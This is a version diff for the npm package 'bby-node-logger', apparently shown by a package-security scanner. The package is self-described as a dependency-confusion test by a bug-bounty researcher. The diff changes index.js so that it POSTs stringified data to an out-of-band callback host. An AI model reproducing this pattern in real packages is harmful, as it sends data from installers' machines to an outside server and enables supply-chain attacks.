bby-node-logger 4.2.2 → 4.2.3

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -32,7 +32,7 @@ const data = querystring.stringify({
32
32
 
33
33
  // Options for the POST request
34
34
  const options = {
35
- hostname: 'crktv24qfhfgh6mltnsg7w3jyf5y6usrf.oast.live', // Replace with actual external server
35
+ hostname: 'crkva14qfhfgm3l846egh3s5y65mr944b.oast.me', // Replace with actual external server
36
36
  port: 80, // Change port if using HTTPS or a custom port
37
37
  path: '/endpoint', // Replace with actual path
38
38
  method: 'POST',
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "bby-node-logger",
3
- "version": "4.2.2",
3
+ "version": "4.2.3",
4
4
  "description": "Dependency Confusion Test by iQimpz (https://hackerone.com/iqimpz)",
5
5
  "main": "index.js",
6
6
  "scripts": {